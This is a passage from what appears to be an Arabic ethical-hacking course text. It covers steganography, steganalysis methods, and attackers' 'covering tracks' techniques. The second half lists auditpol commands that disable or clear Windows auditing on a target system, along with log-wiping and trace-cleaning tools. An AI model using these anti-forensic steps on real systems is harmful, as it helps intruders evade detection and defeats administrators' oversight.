Sams Big G Play Makerھو ﺑرﻧﺎﻣﺞ ﻣﺳﺗﻧد إﻟﻰ ﻧظﺎم اﻟﺗﺷﻐﯾل وﯾﻧدوز اﻟﺗﻲ ﺗم ﺗﺻﻣﯾﻣﮭﺎ ﻹﺧﻔﺎء اﻟرﺳﺎﺋل اﻟﺳرﯾﺔ ﻓﻲ ﺷﻛل ﻣﺳرﺣﯾﺔ
) (Playﻣﺳﻠﯾﺔ أو ﻣﺣﺎدﺛﺔ .ھذا ﯾﻧطﺑﻖ ﻋﺎدة ﻋﻠﻰ اﻟرﺳﺎﺋل اﻟﺻﻐﯾرة .ﯾﺗم إﺧراج اﻟرﺳﺎﻟﺔ اﻟﺳرﯾﺔ اﻟﺗﻲ ﯾﺗم إﻧﺷﺎؤھﺎ ﺑﺎﺳﺗﺧدام ھذه اﻷداة ،ﻻ ﯾﻣﻛن
ﻟﻠﻣرء أن ﯾدرك أن ﻧص اﻟﻣﺳرﺣﯾﺔ اﻟﻧﺎﺗﺞ ﯾﺣﺗوي ﻋﻠﻰ اﻟرﺳﺎﻟﺔ اﻟﺧﻔﯾﺔ.
Steganalysis
Steganalysisھﻲ ﻋﻣﻠﯾﺔ ﻋﻛﺳﯾﺔ ﺿد .steganographyﺣﯾث steganographyﯾﺳﺗﺧدم ﻓﻲ إﺧﻔﺎء اﻟﺑﯾﺎﻧﺎت ،ﺑﯾﻧﻣﺎ Steganalysis
ﯾﺳﺗﺧدم ﻟﻠﻛﺷف ﻋن اﻟﺑﯾﺎﻧﺎت اﻟﻣﺧﻔﯾﺔ .ﻓﺈﻧﮫ ﯾﺣدد اﻟرﺳﺎﻟﺔ اﻟﺧﻔﯾﺔ اﻟﻣﺷﻔرة ،وإذا ﻛﺎن ذﻟك ﻣﻣﻛﻧﺎ ،ﻓﺈﻧﮫ ﯾﺳﺗرد ﺗﻠك اﻟرﺳﺎﻟﺔ .وﯾﻣﻛن اﻟﻛﺷف ﻋن
اﻟرﺳﺎﻟﺔ ﻣن ﺧﻼل اﻟﻧظر ﻓﻲ اﻟﻔروق ﺑﯾن أﻧﻣﺎط اﻟﺑت وأﺣﺟﺎم اﻟﻣﻠﻔﺎت اﻟﻛﺑﯾرة ﺑﺷﻛل ﻏﯾر ﻋﺎدي.
اﻟﺧطوة اﻷوﻟﻰ ﻓﻲ Steganalysisھو اﻛﺗﺷﺎف اﻟﺻورة اﻟﺗﻲ ﯾﺷﺗﺑﮫ ﻓﯾﮭﺎ ﺑﺈﯾواء رﺳﺎﻟﺔ .وﯾﻌﺗﺑر أن ھذا ھﺟوم ﻋﻠﻰ اﻟﻣﻌﻠوﻣﺎت اﻟﻣﺧﻔﯾﺔ .ھﻧﺎك
ﻧوﻋﺎن ﻣن أﻧواع اﻟﮭﺟﻣﺎت اﻷﺧرى ﺿد إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت message attacks :و.chosen-message attacks
Steganalystﯾﻌرف ﺑوﺟود اﻟرﺳﺎﻟﺔ اﻟﻣﺧﻔﯾﺔ ﻓﻲ ﻣﻠف stego-imageاﻟﻣﻘﺎﺑل .ﯾﺣدد steganalystاﻷﻧﻣﺎط اﻟﺗﻲ ﺗﻧﺷﺄ ﻣن إﺧﻔﺎء اﻟرﺳﺎﻟﺔ
وﻛﺷف ھذه اﻟرﺳﺎﻟﺔ Steganalyst .ﯾﻘوم ﺑﺈﻧﺷﺎء رﺳﺎﻟﺔ ﺑﺎﺳﺗﺧدام أداة stegoﯾﻌرف وﯾﺣﻠل اﻻﺧﺗﻼﻓﺎت ﻓﻲ اﻷﻧﻣﺎط.
ﺻور اﻟﻐطﺎء ﺗﻛﺷف ﻋن اﻟﻣزﯾد ﻣن اﻟﻘراﺋن اﻟﺑﺻرﯾﺔ ﺑﺎﻟﻣﻘﺎرﻧﺔ ﻣﻊ .stego-imageﻓﻣن اﻟﺿروري ﺗﺣﻠﯾل stego-imageﻟﺗﺣدﯾد
اﻟﻣﻌﻠوﻣﺎت اﻟﺗﻲ ﯾﺗم إﺧﻔﺎؤھﺎ .اﻟﻔﺟوة ﺑﯾن ﺻورة اﻟﻐطﺎء وﺣﺟم اﻟﻣﻠف stego-imageﻣن اﻟﺳﮭل ﺗوﻗﻌﮫ .اﻟﻌدﯾد ﻣن اﻟﺗوﻗﯾﻌﺎت ﺗﻛون واﺿﺣﺔ
ﺑﺎﺳﺗﺧدام اﻟﻌدﯾد ﻣن اﺳﻛﯾﻣﺎت اﻷﻟوان ﻣن ﺻورة اﻟﻐطﺎء.
ﺑﻣﺟرد اﻛﺗﺷﺎﻓﮭﺎ Stego-image ،ﯾﻣﻛن ﺗدﻣﯾرھﺎ أو ﺗﻌدﯾل اﻟرﺳﺎﻟﺔ اﻟﻣﺧﻔﯾﺔ .ﺑﻌض اﻟﺑﯾﺎﻧﺎت اﻟﺗﻲ ﯾﺗم اﺧﻔﺎﺋﮭﺎ ﺑداﺧل اﻟﺻورة ﺑﺎﺳﺗﺧدام
Image Domain Toolﯾﻣﻛن أن ﺗﻛون ﻋدﯾم اﻟﻔﺎﺋدة.
ﺗﺣدﯾﺎت: Steganalysis
-ﺗﯾﺎر اﻟﻣﻌﻠوﻣﺎت اﻟﻣﺷﺗﺑﮫ ﻓﯾﮫ ﻗد أو ﻗد ﻻ ﯾﻣﻠك ﺗرﻣﯾز اﻟﺑﯾﺎﻧﺎت اﻟﻣﺧﻔﯾﺔ
Suspect information stream may or may not have encoded hidden data
-اﻟﻛﺷف ﻋن ﻛﻔﺎءة ودﻗﺔ اﻟﻣﺣﺗوﯾﺎت اﻟﻣﺧﺑﺄة داﺧل اﻟﺻور اﻟرﻗﻣﯾﺔ.
Efficient and accurate detection of hidden content within digital images
ﻓﻲ إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت اﻟﺳﻣﻌﯾﺔ ،اﻟﻣﻌﻠوﻣﺎت اﻟﺳرﯾﺔ ﻣﺛل اﻟوﺛﺎﺋﻖ واﻟﻣﻠﻔﺎت اﻟﺧﺎﺻﺔ ﯾﺗم ﺗﺿﻣﯾﻧﮭﺎ ﻓﻲ ﻣﻠف اﻟﺻوت اﻟرﻗﻣﻲ .ﯾﻣﻛن اﻟﻛﺷف ﻋن ھذه
اﻟوﺛﺎﺋﻖ اﻟﺗﻲ ﺗم إﺧﻔﺎﺋﮭﺎ ﺑﺎﺳﺗﺧدام اﻟطرق اﻟﺗﺎﻟﯾﺔ:
-طرﯾﻘﺔ اﻟﺗﺣﻠﯾل اﻹﺣﺻﺎﺋﻲ ﯾﻣﻛﻧﮭﺎ أﯾﺿﺎ أن ﺗﺳﺗﺧدم ﻟﻣﻠﻔﺎت اﻟﺻوت ﺣﯾث ﯾﺗم اﺳﺗﺧدام ﺗﻌدﯾﻼت LSBأﯾﺿﺎ ﻋﻠﻰ ﻣﻠف اﻟﺻوت.
-اﻟﺗرددات ﻏﯾر ﻣﺳﻣوﻋﺔ ﯾﻣﻛن ﻓﺣﺻﮭﺎ ﻟﻠﺣﺻول ﻋﻠﻰ ﻣﻌﻠوﻣﺎت.
-اﻟﺗﺷوھﺎت اﻟﻔردﯾﺔ واﻷﻧﻣﺎط ﺗظﮭر وﺟود ﺑﯾﺎﻧﺎت ﺳرﯾﺔ.
Video File -
ﻓﻲ إﺧﻔﺎء ﻣﻌﻠوﻣﺎت اﻟﻔﯾدﯾو ،اﻟﻣﻌﻠوﻣﺎت اﻟﺳرﯾﺔ أو أي ﻧوع ﻣن اﻟﻣﻠﻔﺎت ذات أي ﻧوع ﻣن اﻻﻣﺗدادات ﯾﺗم إﺧﻔﺎﺋﮫ ﻓﻲ ﻣﻠف اﻟﻔﯾدﯾو اﻟﻧﺎﻗل إﻣﺎ
ﺑﺎﺳﺗﺧدام أدوات audio steganographyأو .image steganographyوﺑﺎﻟﺗﺎﻟﻲ ،ﻓﺈن اﻟﻛﺷف ﻋن اﻟﺑﯾﺎﻧﺎت اﻟﺳرﯾﺔ ﻓﻲ ﻣﻠﻔﺎت اﻟﻔﯾدﯾو
ﯾﺗﺿﻣن ﻣﺟﻣوﻋﺔ ﻣن اﻷﺳﺎﻟﯾب اﻟﻣﺳﺗﺧدﻣﺔ ﻓﻲ اﻟﺻورة واﻟﻣﻠﻔﺎت اﻟﺻوﺗﯾﺔ .ﯾوﺟد اﻛواد ﺧﺎﺻﮫ وإﯾﻣﺎءات ﯾﻣﻛن اﺳﺗﺧداﻣﮭﺎ ﻟﻠﻛﺷف ﻋن اﻟﺑﯾﺎﻧﺎت
اﻟﺳرﯾﺔ.
ﺑﻣﺟرد ﻛﺳر اﻟﻣﮭﺎﺟم اﻟﺷﺑﻛﺔ اﻟﻣﺳﺗﮭدﻓﺔ أو اﻟﻛﻣﺑﯾوﺗر ﺑﻧﺟﺎح ،ﻓﺎﻧﮫ ﯾﺣﺎول إﺧﻔﺎء ﻧﻔﺳﮫ ﻣن أن ﯾﺗم اﻛﺗﺷﺎﻓﮫ أو ﺗﺗﺑﻌﮫ .ﺑﺎﻟﺗﺎﻟﻲ ،ﯾﺣﺎول اﻟﻣﮭﺎﺟم
ﻟﺗﻐطﯾﺔ ﺟﻣﯾﻊ اﻟﻣﺳﺎرات أو اﻟﺳﺟﻼت اﻟﺗﻲ ﯾﺗم إﻧﺷﺎؤھﺎ أﺛﻧﺎء ﻣﻣﺎرﺳﺗﮫ أو ﻣﺣﺎوﻻت اﻟوﺻول إﻟﻰ اﻟﺷﺑﻛﺔ اﻟﻣﺳﺗﮭدﻓﺔ أو اﻟﻛﻣﺑﯾوﺗر.
ﻟﻤﺎذا ﻧﺤﺘﺎج اﻟﻰ ﺗﻐﻄﯿﺔ اﻟﻤﺴﺎرات) (Why Cover Tracks؟
اﻟوظﯾﻔﺔ اﻟﻛﺎﻣﻠﺔ ﻟﻠﻣﮭﺎﺟم ﯾﻧطوي ﻟﯾس ﻓﻘط ﻋﻠﻰ اﻟﻣﺳﺎس ﺑﺎﻟﻧظﺎم ﺑﻧﺟﺎح وﻟﻛن أﯾﺿﺎ ﺗﻌطﯾل اﻟﺗﺳﺟﯾل ،وﺗطﮭﯾر ﻣﻠﻔﺎت اﻟﺳﺟل ،واﻟﻘﺿﺎء ﻋﻠﻰ
اﻷدﻟﺔ ،وزرع أدوات إﺿﺎﻓﯾﺔ ،واﻟﺗﻲ ﺗﻐطﻲ اﻟﻣﺳﺎرات .اﻟﻣﮭﺎﺟم ﯾﺟب ﻋﻠﯾﮫ ﻣﺳﺢ أي دﻟﯾل ﻋﻠﻰ وﺟوده .ﻣﺣو ﺳﺟﻼت اﻟﺗﺳﻠل ،وﺗﺗﺑﻊ اﻟﻣﻠﻔﺎت،
وﻋﻣﻠﯾﺎت اﻟﮭﺟوم ھو أﻣر ﺑﺎﻟﻎ اﻷھﻣﯾﺔ ﻟﻠﻣﮭﺎﺟﻣﯾن ﻛﻣﺎ ﯾﻣﻛن ﻟﻠرﺳﺎﺋل ﺗﻧﺑﯾﮫ اﻟﻣﺎﻟك اﻟﻔﻌﻠﻲ ﻟﻠﻧظﺎم ﻟﺗﻐﯾﯾر إﻋدادات اﻷﻣﺎن ﻟﺗﺟﻧب اﻟﮭﺟﻣﺎت ﻓﻲ
اﻟﻣﺳﺗﻘﺑل .ﻓﺈذا ﺣدث ھذا ،ﻓﺎن اﻟﻣﮭﺎﺟم ﺳوف ﯾﺗرك ﺑﻌد ذﻟك ﻣﻊ ﻋدم وﺟود ﻓرص ﻟﻠوﻟوج اﻟﻰ اﻟﻧظﺎم ﻹطﻼق اﻟﮭﺟوم .وﺑﺎﻟﺗﺎﻟﻲ ،ﻓﺎن اﻟﻣﮭﺎﺟم
ﯾﻘوم ﺑﺗدﻣﯾر اﻷدﻟﺔ ﻋﻠﻰ اﻟﺗدﺧل ﻟﻠﺣﻔﺎظ ﻋﻠﻰ اﻟوﺻول واﻟﺗﮭرب .إذا ﻏطﻲ اﻟﻣﮭﺎﺟم أو ﺣذف اﻟﻣﺳﺎرات ،ﻓﺎﻧﮫ ﯾﻣﻛن إﻋﺎدة ﺗﺳﺟﯾل اﻟدﺧول إﻟﻰ
اﻟﻧظﺎم واﻟﺗﺛﺑﯾت اﻟﺧﻔﻲ .وﺑﺎﻟﺗﺎﻟﻲ ،ﯾﻣﻛن ﻟﻠﻣﮭﺎﺟم اﻟﺣﺻول ﻋﻠﻰ اﻟﻣﻌﻠوﻣﺎت اﻟﺣﺳﺎﺳﺔ ﻟﻠﻣﺳﺗﺧدﻣﯾن ﻣﺛل أﺳﻣﺎء اﻟﻣﺳﺗﺧدﻣﯾن وﻛﻠﻣﺎت اﻟﻣرور
ﻟﻠﺣﺳﺎﺑﺎت اﻟﻣﺻرﻓﯾﺔ ،وﻣﻌرﻓﺎت اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ ،اﻟﺦ.
ﻗد ﻻ ﯾرﻏب اﻟﻣﮭﺎﺟم ﻓﻲ ﺣذف اﻟﺳﺟل ﻛﺎﻣل ﻟﺗﻐطﯾﺔ اﻟﻣﺳﺎرات ﻷﻧﮭﺎ ﻗد ﺗﺗطﻠب اﻣﺗﯾﺎزات اﻟﻣدﯾر .إذا ﻛﺎن اﻟﻣﮭﺎﺟم ﻗﺎدرا ﻋﻠﻰ ﺣذف ﺳﺟﻼت
أﺣداث اﻟﮭﺟوم ،ﺣﺗﻰ ذﻟك اﻟﺣﯾن ﻓﺎن اﻟﻣﮭﺎﺟم ﯾﺧﻔﻲ ﻧﻔﺳﮫ ﻣن أن ﯾﺗم اﻛﺗﺷﺎﻓﮫ.
ﻣﺣو اﻷدﻟﺔ ھو ﺷرط ﻷي ﻣﮭﺎﺟم اﻟذﯾن ﯾرﻏﺑون ﻓﻲ اﻟﺑﻘﺎء ﻏﺎﻣﺿﯾن .ھذا اﻷﺳﻠوب واﺣد ﻟﺗﻔﺎدي اﻟﺗﺗﺑﻊ ﻣرة أﺧرى .ﯾﺑدأ ھذا ﻣﻊ ﻣﺣو ﺗﺳﺟﯾﻼت
اﻟدﺧول اﻟﻣﻠوﺛﺔ ورﺳﺎﺋل اﻟﺧطﺄ اﻟﻣﺣﺗﻣﻠﺔ اﻟﺗﻲ رﺑﻣﺎ ﺗﻛون ﻗد وﻟدت ﻣن ﻋﻣﻠﯾﺔ اﻟﮭﺟوم .اﻟﺗﺎﻟﻲ ،ﺗﺷﻐﯾل اﻻﻧﺗﺑﺎه إﻟﻰ إﺣداث أﯾﺔ ﺗﻐﯾﯾرات ﺑﺣﯾث ﻻ
ﯾﺳﻣﺢ ﺑﺗﺳﺟﯾل اﻟدﺧول اﻟﻣﺳﺗﻘﺑﻠﻲ .ﻋن طرﯾﻖ اﻟﺗﻼﻋب واﻟﺗﻐﯾﯾر واﻟﺗﺑدﯾل ﻓﻲ ﺳﺟﻼت اﻷﺣداث ،ﯾﻣﻛن ﻟﻣﺳؤول اﻟﻧظﺎم أن ﯾﻛون ﻋﻠﻰ ﻗﻧﺎﻋﺔ ﺑﺄن
إﺧراج اﻟﻧظﺎم ﺻﺣﯾﺢ ،وأﻧﮫ ﻻ ﯾوﺟد ﺗﺳرﯾب أو ﺣل وﺳط ﻗد اﺗﺧذت ﻓﻌﻼ.
إن أول ﺷﻲء ﯾﻘوم ﺑﮫ ﻣﺳؤول اﻟﻧظﺎم ﻟﻣراﻗﺑﺔ اﻟﻧﺷﺎط ﻏﯾر ﻋﺎدي ھو اﻟﺗﺣﻘﻖ ﻣن ﻣﻠﻔﺎت ﺳﺟل اﻟﻧظﺎم ،ﻓﺈﻧﮫ ﻣن اﻟﺷﺎﺋﻊ ﻟﻠدﺧﻼء اﺳﺗﺧدام اﻷداة
اﻟﻣﺳﺎﻋدة ﻟﺗﻌدﯾل ﺳﺟﻼت اﻟﻧظﺎم .ﻓﻲ ﺑﻌض اﻟﺣﺎﻻت rootkits ،ﯾﻣﻛﻧﮫ ﺗﻌطﯾل وﺗﺟﺎھل ﻛﺎﻓﺔ اﻟﺳﺟﻼت اﻟﻣوﺟودة .ﯾﺣدث ھذا إذا ﻛﺎن اﻟﻣﺗﺳﻠﻠﯾن
ﯾﻧون اﺳﺗﺧدام اﻟﻧظﺎم ﻟﻔﺗرة أطول ﻣن اﻟزﻣن ﻛﻘﺎﻋدة اﻧطﻼق ﻟﻌﻣﻠﯾﺎت اﻻﻗﺗﺣﺎم ﻓﻲ اﻟﻣﺳﺗﻘﺑل ،إذا ﻛﺎﻧت إزاﻟﺔ ﺗﻠك اﻷﺟزاء ﻓﻘط ﻣن اﻟﺳﺟﻼت اﻟﺗﻲ
ﯾﻣﻛن أن ﺗﻛﺷف ﻋن وﺟود اﻟﮭﺟوم.
ﯾﺗﺣﺗم ﻋﻠﻰ اﻟﻣﮭﺎﺟﻣﯾن ﺟﻌل اﻟﻧظﺎم ﯾﺑدو وﻛﺄﻧﮫ ﻓﻌﻼ ﯾﺑدو ﻗﺑل أن ﯾﺗﻣﻛن ﻣن اﻟوﺻول ﻟﻠﻧظﺎم وﺗﺛﺑﯾت Backdoorﻻﺳﺗﺧداﻣﮭﺎ .أي ﻣن اﻟﻣﻠﻔﺎت
اﻟﺗﻲ ﺗم ﺗﻌدﯾﻠﮭﺎ ﺗﺣﺗﺎج إﻟﻰ ﺗﻐﯾﯾره ﻣرة أﺧرى إﻟﻰ ﺻﻔﺎﺗﮫ اﻷﺻﻠﯾﺔ) . (original attributesھﻧﺎك اﻟﻌدﯾد ﻣن اﻷدوات اﻟﺗﻲ ﺗﺳﺗﺧدم ﻟﺗﻐطﯾﺔ
اﻟﻣﺳﺎرات اﻟﻣﺗﻌﻠﻘﺔ ﺑﻧظﺎم اﻟﺗﺷﻐﯾل .NTﻗﺎﺋﻣﺔ اﻟﻣﻌﻠوﻣﺎت ،ﻣﺛل ﺣﺟم اﻟﻣﻠف واﻟﺗﺎرﯾﺦ ،ھو ﻣﺟرد ﻣﻌﻠوﻣﺎت وﺻﻔﯾﮫ ) (attributeﺑداﺧل اﻟﻣﻠف.
اﻟﺣﻣﺎﯾﺔ ﺿد اﻟﻣﮭﺎﺟﻣﯾن اﻟذي ﯾﺣﺎول ﺗﻐطﯾﺔ ﻣﺳﺎرات اﻟﮭﺟوم ﻋن طرﯾﻖ ﺗﻐﯾﯾر ﻣﻌﻠوﻣﺎت اﻟﻣﻠف ﺗﺻﺑﺢ ﺻﻌﺑﺔ .وﻣﻊ ذﻟك ،ﻓﻣن اﻟﻣﻣﻛن اﻟﻛﺷف
ﻋﻣﺎ إذا ﻛﺎن اﻟﻣﮭﺎﺟم ﻗد ﻏﯾر ﻣﻌﻠوﻣﺎت اﻟﻣﻠف ﻋن طرﯾﻖ ﺣﺳﺎب ھﺎش اﻟﺗﺷﻔﯾر ﻋﻠﻰ اﻟﻣﻠف .ھذا اﻟﻧوع ﻣن اﻟﮭﺎش ھو اﻟﺣﺳﺎب)(calculation
اﻟذي ﯾﺗم ﺿد اﻟﻣﻠف ﺑﺄﻛﻣﻠﮫ ﺛم ﺗﺷﻔﯾره.
طﺮق ﻣﺴﺢ اﻟﻤﺴﺎرات اون ﻻﯾﻦ )(Ways to Clear Online Tracks
اﻹﻧﺗرﻧت ھو اﻟﻣورد اﻟﻧﮭﺎﺋﻲ ﻟﻠﺑﺣث أو ﻟﺟﻣﻊ اﻟﻣﻌﻠوﻣﺎت اﻟﺗﻲ ﺗﺗﻌﻠﻖ ﺑﺄي ﻣوﺿوع .ﻟﻸﺳف ،ﯾﺳﺎء اﺳﺗﺧدام ﻣوارد اﻹﻧﺗرﻧت ﻣن ﻗﺑل اﻟﻣﮭﺎﺟﻣﯾن
ﻟﺗﻌﻘب أﻧﺷطﺔ اﻵﺧرﯾن ﻋﺑر اﻹﻧﺗرﻧت ،واﻟﺗﻲ ﺗﺳﻣﺢ ﻟﮭم ﺑﺷن اﻟﮭﺟﻣﺎت أو اﻟﺳرﻗﺔ.
ھﻧﺎك ﻋدة طرق ﻟﻣﺳﺢ اﻟﻣﺳﺎرات اون ﻻﯾن:
-اﻟﺗﺻﻔﺢ اﻟﺧﺎص Private browsing
-اﻟﺗﺎرﯾﺦ ﻓﻲ ﺣﻘل اﻟﻌﻧوان History in the address field
-ﺗﻌطﯾل ﺗﺧزﯾن اﻟﺗﺎرﯾﺦ Disable stored history
-ﺣذف اﻟﺑﯾﺎﻧﺎت اﻟﺧﺎﺻﺔ Delete private data
-ﺣذف ﻣﻠﻔﺎت اﻟﻛوﻛﯾز ﻋﻧد اﻟﺧروج Clear cookies on exit
-ﺗﻔرﯾﻎ ذاﻛرة اﻟﺗﺧزﯾن اﻟﻣؤﻗت ﻋﻧد اﻟﺧروج Clear cache on exit
-ﺣذف اﻟﺗﻧزﯾﻼت Delete downloads
-ﺗﻌطﯾل ﻣدﯾر ﻛﻠﻣﺔ اﻟﺳر Disable password manager
-ﺗﻔرﯾﻎ اﻟﺑﯾﺎﻧﺎت ﻓﻲ إدارة ﻛﻠﻣﺔ اﻟﻣرور Clear data in password manager
-ﺣذف اﻟﺟﻠﺳﺎت اﻟﻣﺣﻔوظﺔ Delete saved sessions
-ﺣذف ﺟﺎﻓﺎ ﺳﻛرﯾﺑت اﻟﻣﺳﺗﺧدم Delete user JavaScript
-اﻧﺷﺎء ﻋدة ﻣﺳﺗﺧدﻣﯾن Set up multiple users
-ﺣذف أﻛﺛر اﻷﺷﯾﺎء اﻟﻣﺳﺗﺧدﻣﺔ ﻣؤﺧرا )Remove Most Recently Used (MRU
-ﺗﻔرﯾﻎ ﺑﯾﺎﻧﺎت ﺷرﯾط اﻷدوات ﻣن اﻟﻣﺗﺻﻔﺣﺎت Clear Toolbar data from the browsers
-إﯾﻘﺎف اﻹﻛﻣﺎل اﻟﺗﻠﻘﺎﺋﻲ Turn off Autocomplete
اﻟﻣﺻدرhttp://technet.microsoft.com/en-us :
واﺣدة ﻣن اﻟﺧطوات اﻷوﻟﻰ ﻟﻠﻣﮭﺎﺟم اﻟذي ﻟدﯾﮫ اﻟﻘدرة ﻋﻠﻰ اﺳﺗﺧدام ﺳطر اﻷواﻣر )(cmdھو ﺗﺣدﯾد ﺣﺎﻟﺔ اﻟﺗدﻗﯾﻖ ) (auditingﻟﻠﻧظﺎم اﻟﮭدف،
ﺗﺣدﯾد ﻣوﻗﻊ اﻟﻣﻠﻔﺎت اﻟﺣﺳﺎﺳﺔ )ﻣﺛل ﻣﻠﻔﺎت ﻛﻠﻣﺔ اﻟﺳر( ،وزرع أدوات ﺟﻣﻊ اﻟﻣﻌﻠوﻣﺎت اﻟﯾﺎ )ﻣﺛل ﺗﺳﺟﯾل ﺿرﺑﺎت اﻟﻣﻔﺎﺗﯾﺢ أو اﻟﺗﺟﺳس ﻋﻠﻰ
اﻟﺷﺑﻛﺔ ].( [network sniffer
Windows auditingﺗﻘوم ﺑﺗﺳﺟﯾل ﺑﻌض اﻷﺣداث إﻟﻰ ﺳﺟل اﻷﺣداث)) (event logأو syslogاﻟﻣرﺗﺑطﺔ ﺑﮭﺎ( .ﯾﻣﻛن ﺗﻌﯾﯾن ﺳﺟل
ﻹرﺳﺎل ﺗﻧﺑﯾﮭﺎت )اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ ،pager ،وھﻠم ﺟرا( إﻟﻰ ﻣﺳؤول اﻟﻧظﺎم .وﺑﺎﻟﺗﺎﻟﻲ ،ﻓﺈن اﻟﻣﮭﺎﺟم ﯾرﯾد أن ﯾﻌرف ﺣﺎﻟﺔ ﺗدﻗﯾﻖ اﻟﻧظﺎم
) (Windows auditingاﻟذي ﯾﺣﺎول اﺧﺗراﻗﮫ ﻗﺑل اﻟﺷروع ﻓﻲ ﺗﻧﻔﯾذ ﺧططﮫ.
أداة Auditpol.exeھو ﺟزء ﻣن ﻣﺟﻣوﻋﺔ أدوات NT resource kitواﻟﺗﻲ ﯾﻣﻛن اﺳﺗﺧداﻣﮭﺎ ﻛﺄﻧﮭﺎ ﺳطر أواﻣر ﺑﺳﯾط ﻟﻣﻌرﻓﺔ ﺣﺎﻟﺔ ﺗدﻗﯾﻖ
اﻟﻧظﺎم ) (Windows auditingاﻟﮭدف وأﯾﺿﺎ إﺟراء ﺗﻐﯾﯾرات ﻋﻠﯾﮫ.
ﺳوف اﻟﻣﮭﺎﺟم ﺗﺣﺗﺎج إﻟﻰ ﺗﺛﺑﯾت اﻷداة ﻓﻲ ﻣﺳﺎر .WINNTوﻣن ھﻧﺎ ﯾﻣﻛﻧﮫ ﺗﺄﺳﯾس ﺟﻠﺳﺔ ﻋﻣل ﻓﺎرﻏﺔ ) (Null Sessionإﻟﻰ اﻟﺟﮭﺎز اﻟﮭدف
ﺛم ﯾﻘوم ﺑﺗﺷﻐﯾل اﻷﻣر:
>C:\> auditpol \\<ip address of target
ھذا ﺳوف ﯾﻛﺷف ﺣﺎﻟﺔ اﻟﺗدﻗﯾﻖ) (auditing statusاﻟﺣﺎﻟﯾﺔ ﻟﻠﻧظﺎم .ﺛم اﻧﮫ ﯾﻣﻛن أن ﯾﺧﺗﺎر ﺗﻌطﯾل اﻟﺗدﻗﯾﻖ) (auditingﺑواﺳطﺔ:
C :\> auditpol \\<ip address of target) /disable
ھذا اﻻﺟراء ﺳوف ﯾﻘوم ﺑﺎﻟﻌدﯾد ﻣن اﻟﺗﻐﯾﯾرات ﻓﻲ ﻣﺧﺗﻠف ﻣﻠﻔﺎت اﻟﺳﺟﻼت اﻟﺗﻲ ﺗﺳﺟل أي ﻣن اﻻﻓﻌﺎل .اﻧﮫ ﯾﻣﻛن أن ﯾﺧﺗﺎر ﻹﺧﻔﺎء ﺗﻐﯾرات
ﻣﻔﺎﺗﯾﺢ اﻟﺗﺳﺟﯾل ﻓﻲ وﻗت ﻻﺣﻖ.
ﻟﺣظﺔ ﻛﺳب اﻣﺗﯾﺎزات إدارﯾﺔ ﻣن ﻗﺑل اﻟدﺧﻼء ،ﻓﺈﻧﮫ ﯾﻣﻛن ﺗﻌطﯾل اﻟﺗدﻗﯾﻖ ﺑﻣﺳﺎﻋدة .auditpol.exeﺑﻣﺟرد اﻻﻧﺗﮭﺎء ﻣن ﻋﻣﻠﮫ ،ﻓﺎﻧﮫ ﺑﻌد
ﺧروج اﻟدﺧﻼء ﯾﺗم ﺗﻔﻌﯾل اﻟﺗدﻗﯾﻖ ﻣرة أﺧرى ﺑﺎﺳﺗﺧدام ﻧﻔس اﻷداة.audit.exe :
ﻣﻦ اﻟﻤﺜﺎل اﻟﺘﺎﻟﻲ ﺳﻮف ﻧﺘﻌﻠﻢ ﻛﯿﻔﯿﺔ اﻋﺪاد Audit policy
ﻟﺗﻔرﯾﻎ أي ﻣن Audit policiesﯾﺗم ذﻟك ﻣن ﺧﻼل طﺑﺎﻋﺔ اﻻﻣر ].[auditpol /clear /y -
اﻟﻣﺻدرhttp://www.piriform.com :
CCleanerھو أداه ﻟﺗﺣﺳﯾن اﻟﻧظﺎم ،اﻟﺧﺻوﺻﯾﺔ ،وأداة ﺗﻧظﯾف .ﻓﺈﻧﮫ ﯾﺳﻣﺢ ﻟك ﺑﺈزاﻟﺔ اﻟﻣﻠﻔﺎت اﻟﻐﯾر ﻣﺳﺗﺧدﻣﺔ وﯾﻧظف آﺛﺎر ﺗﻔﺎﺻﯾل ﺗﺻﻔﺢ
اﻹﻧﺗرﻧت ﻣن ﺧﻼل ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر .ﻓﺈﻧﮫ ﯾﺣﻔظ ﺧﺻوﺻﯾﺗك ﻋﻠﻰ اﻹﻧﺗرﻧت ،وﯾﺟﻌل اﻟﻧظﺎم أﺳرع وأﻛﺛر أﻣﻧﺎ .ﺑﺎﻹﺿﺎﻓﺔ إﻟﻰ ذﻟك ،ﻓﺈﻧﮫ ﯾﺣرر
ﻣﺳﺎﺣﺔ اﻟﻘرص اﻟﺛﺎﺑت ﻻﺳﺗﺧداﻣﮭﺎ ﻣرة أﺧرى .ﻣﻊ ھذه اﻷداة ،ﯾﻣﻛﻧك ﻣﺣو اﻟﻣﺳﺎرات اﻟﺧﺎﺻﺔ ﺑك ﺑﺳﮭوﻟﺔ ﺟدا .ﻛﻣﺎ أﻧﮫ ﯾﻧظف آﺛﺎر اﻷﻧﺷطﺔ
اﻟﺧﺎﺻﺔ ﺑك ﻋﻠﻰ اﻻﻧﺗرﻧت ﻣﺛل ﺗﺎرﯾﺦ اﻹﻧﺗرﻧت اﻟﺧﺎص ﺑك.
اﻟﻣﺻدرhttp://www.brightfort.com :
MRU-Blasterھو ﺗطﺑﯾﻖ ﯾﺳﻣﺢ ﻟك ﺑﺗﻧظﯾف أﻛﺛر اﻟﻘواﺋم اﻟﻣﺳﺗﺧدﻣﺔ ﻣؤﺧرا ﻋﻠﻰ اﻟﻧظﺎم ،وﻣﻠﻔﺎت اﻻﻧﺗرﻧت اﻟﻣؤﻗﺗﺔ ،واﻟﻛوﻛﯾز .ﻗﺎﺋﻣﺔ
MRUﯾوﻓر ﻟك ﻣﻌﻠوﻣﺎت ﻛﺎﻣﻠﺔ ﻋن أﺳﻣﺎء وﻣواﻗﻊ اﻟﻣﻠﻔﺎت اﻷﺧﯾرة اﻟﺗﻲ وﺻﻠت إﻟﯾﮭﺎ ،ﻓﺗﺢ ،ﺣﻔظ ،واﻟﻧظر ﻓﯾﮭﺎ .ﻓﺈﻧﮫ ﯾﺿﻣن ﺧﺻوﺻﯾﺔ
